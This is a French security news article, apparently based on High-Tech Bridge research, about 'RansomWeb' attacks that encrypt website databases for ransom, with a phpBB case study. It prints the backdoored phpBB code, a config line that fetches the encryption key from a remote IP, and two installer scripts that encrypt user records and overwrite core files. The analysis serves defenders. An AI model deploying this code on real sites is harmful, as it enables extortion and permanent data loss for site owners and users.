« RansomWeb » le nouveau vecteur d'attaque qui crypte les bases de données des sites web

Les chercheurs de High-Tech Bridge ont publié une recherche sur les cybercriminels qui cryptent les bases de données des sites web et les tiennent en rançon avec « RansomWeb »

De plus en plus de personnes deviennent victimes de ransomware, un logiciel malveillant qui crypte vos données et demande de l’argent pour les déchiffrer. Une nouvelle tendance sur le marché montre que les cybercriminels cibleront désormais également votre site web pour obtenir un paiement de rançon de votre part.

En décembre 2014, les experts en sécurité de High-Tech Bridge ont découvert un cas très intéressant de compromission d’un site web d’une entreprise financière : le site était hors service affichant une erreur de base de données, tandis que le propriétaire du site recevait un e-mail demandant une rançon pour « déchiffrer la base de données ». L’application web en question était assez simple et petite, mais très importante pour les affaires de l’entreprise – l’entreprise ne pouvait pas se permettre de la suspendre, ni d’annoncer sa compromission. Une enquête minutieuse menée par High-Tech Bridge a révélé ce qui suit :

• L’application web a été compromise il y a six mois, plusieurs scripts serveur ont été modifiés pour crypter les données avant de les insérer dans la base de données, et pour déchiffrer après avoir récupéré les données de la base de données. Une sorte de patch « à la volée » invisible pour les utilisateurs de l’application web.

• Seuls les champs les plus critiques des tables de la base de données ont été cryptés (probablement pour ne pas trop impacter les performances de l’application web). Tous les enregistrements de base de données existants ont été cryptés en conséquence.

• La clé de cryptage était stockée sur un serveur web distant accessible uniquement via HTTPS (probablement pour éviter l’interception de la clé par divers systèmes de surveillance du trafic).

• Pendant six mois, les hackers ont attendu silencieusement, tandis que les sauvegardes étaient écrasées par les versions récentes de la base de données.

• Au jour J, les hackers ont supprimé la clé du serveur distant. La base de données est devenue inutilisable, le site web est tombé hors service, et les hackers ont exigé une rançon pour la clé de cryptage.

Les chercheurs ont déclaré qu’ils étaient sûrs qu’il s’agissait d’un exemple individuel d’un APT sophistiqué ciblant une entreprise spécifique, cependant la semaine dernière, ils ont été confrontés à un autre cas similaire. L’un de leurs clients, une PME, a été victime de chantage après que son… forum phpBB soit tombé en panne. Le forum était utilisé comme principale plateforme de support client, et donc était important pour le client.

C’était la dernière version de phpBB 3.1.2 publiée le 25 novembre 2014. Aucun utilisateur ne pouvait se connecter (y compris les modérateurs et les administrateurs du forum). Le forum était en ligne, cependant toutes les fonctions nécessitant une authentification de l’utilisateur du forum ne fonctionnaient pas. Notre enquête approfondie a révélé que le moteur du forum avait été patché de telle manière que les mots de passe et les e-mails des utilisateurs étaient cryptés « à la volée » entre l’application web et la base de données.

Les fichiers suivants ont été modifiés :

1. Le fichier « factory.php » a sa fonction « sql_fetchrow() » modifiée de telle manière que le résultat de la requête SQL « $result = $this->get_driver()->sql_fetchrow($query_id); » dans le tableau « result » aura des valeurs décryptées des champs « user_password » et « user_email » :
   if(isset($result[‘user_password’])){
   $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
   }
   if(isset($result[‘user_email’])){
   $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
   }
2. Le fichier « functions_user.php » a une version modifiée de la fonction « user_add » pour ajouter le cryptage :
   $sql_ary = array(
   ‘username’=>$user_row[‘username’],
   ‘username_clean’ => $username_clean,
   ‘user_password’ => (isset($user_row[‘user_password’]))?
   $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
   ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
   ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
   ‘group_id’ => $user_row[‘group_id’],
   ‘user_type’ => $user_row[‘user_type’],
   );
3. Le fichier « cp_activate.php » a une version modifiée de la fonction « main() » :
   $sql_ary = array(
   ‘user_actkey’ => ”,
   ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
   ‘user_newpasswd’ => ”,
   ‘user_login_attempts’ => 0,
   );
4. Le fichier « ucp_profile.php » a une version modifiée de la fonction « main() » :
   if (sizeof($sql_ary))
   {
   $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
   $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
   $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
   SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
   WHERE user_id = ‘ . $user->data[‘user_id’];
   $db->sql_query($sql);
   }
5. Le fichier « config.php » a eu la modification suivante :
   class Cipher {
   private $securekey, $iv;
   function __construct($textkey) {
   $this->securekey = hash(‘sha256’,$textkey,TRUE);
   $this->iv = mcrypt_create_iv(32);
   }
   function encrypt($input) {
   return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
   }
   function decrypt($input) {
   return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
   }
   }
   $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
   sdfds90f8d9s0f8d0f89.txt’);
   $cipher=new Cipher($key);

De plus, les chercheurs ont trouvé deux scripts d’installation de backdoor laissés par les hackers sur le serveur qui permettent de backdoor n’importe quel forum phpBB en quelques clics. Le premier installateur patch le fichier « config.php » pour ajouter la classe « Cipher » qui déchiffre et crypte les données avec la fonction PHP « mcrypt_encrypt() » stockant la clé de cryptage sur un serveur distant :

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “DONE!”;
}; Et le deuxième installateur parcourt tous les utilisateurs phpBB existants pour crypter leurs e-mails et mots de passe, et remplace les fichiers phpBB mentionnés ci-dessus par des copies backdoorées :
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL UPDATED!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “FILES UPDATED!”;

Les attaquants ont attendu deux mois et ont ensuite simplement supprimé la clé du serveur distant. Les chercheurs de High-Tech Bridge ont ensuite découvert que phpBB avait été compromis via un mot de passe FTP volé.
Pour le moment, aucun logiciel antivirus ne détecte même les installateurs comme un logiciel malveillant connu :
« step1.php » fichier
« step2.php » fichier

Suite à la vague d’attaques de ransomware, les chercheurs ont nommé cette technique de piratage « RansomWeb ».

• Essayons de faire une brève analyse des attaques RansomWeb :

• Opportunités potentielles de RansomWeb :

• Contrairement aux attaques DDoS, elles peuvent avoir un impact durable sur la disponibilité de l’application web.

• Peut être utilisé non seulement pour le chantage mais pour la destruction à long terme du site web.

• Les sauvegardes ne peuvent pas beaucoup aider, car la base de données sera sauvegardée en mode crypté, tandis que la clé de cryptage est stockée à distance et ne sera pas sauvegardée.

• Presque impossible de se remettre de l’attaque sans payer la rançon, de nombreuses victimes n’auront d’autre choix que de payer les hackers.

• Les entreprises d’hébergement ne sont pas prêtes pour ce nouveau défi, et ne pourront probablement pas aider leurs clients.

Les chercheurs ont également identifié les faiblesses potentielles de « RansomWeb » qui sont données ci-dessous :

• Peut être facilement détecté par un moniteur d’intégrité des fichiers (cependant, très peu d’entreprises effectuent une surveillance de l’intégrité des fichiers pour les applications web qui peuvent changer chaque jour).

• Assez difficile de crypter l’ensemble de la base de données sans endommager la fonctionnalité et/ou la vitesse de l’application web (néanmoins, même un champ de base de données qui est irrécupérable peut ruiner une application web).

• Peut être détecté assez rapidement lorsqu’il est utilisé sur une application web régulièrement mise à jour.

Ressource : High-Tech Bridge